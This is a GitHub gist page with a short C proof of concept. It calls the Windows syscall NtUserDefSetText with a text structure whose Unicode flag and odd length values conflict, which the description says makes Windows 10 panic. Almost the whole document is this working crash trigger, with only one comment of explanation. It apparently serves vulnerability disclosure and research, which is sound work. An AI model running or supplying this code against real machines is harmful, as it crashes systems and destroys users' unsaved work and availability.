Created
November 8, 2017 17:16
-
-
Save taviso/9e673add738de0da6534cbd20e705d3b to your computer and use it in GitHub Desktop.
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "user32") | |
| #pragma comment(lib, "gdi32") | |
| typedef struct _LARGE_STRING { | |
| ULONG Length; | |
| ULONG MaximumLength:31; | |
| ULONG bAnsi:1; | |
| PVOID Buffer; | |
| } LARGE_STRING, *PLARGE_STRING; | |
| static CHAR kWindowText[32] = "Hello World"; | |
| int main(int argc, char **argv) { | |
| FARPROC NtUserDefSetText = GetProcAddress(LoadLibrary("WIN32U"), "NtUserDefSetText"); | |
| WNDCLASSEX WindowClass = {0}; | |
| HWND Window; | |
| LARGE_STRING DefText = { | |
| .Length = sizeof kWindowText, | |
| .MaximumLength = sizeof kWindowText, | |
| .bAnsi = FALSE, | |
| .Buffer = kWindowText, | |
| }; | |
| // This string has bAnsi set to FALSE, so an odd Length is impossible (must be a count of WCHARs) | |
| // Unless you set the flag incorrectly.. | |
| DefText.MaximumLength |= 1; | |
| DefText.Length |= 1; | |
| WindowClass.cbSize = sizeof(WNDCLASSEX); | |
| WindowClass.lpfnWndProc = DefWindowProc; | |
| WindowClass.hInstance = GetModuleHandle(NULL); | |
| WindowClass.lpszClassName = "Class"; | |
| RegisterClassEx(&WindowClass); | |
| Window = CreateWindowEx(0, "Class", "Window", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, GetModuleHandle(NULL), NULL); | |
| NtUserDefSetText(Window, &DefText); | |
| return 1; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment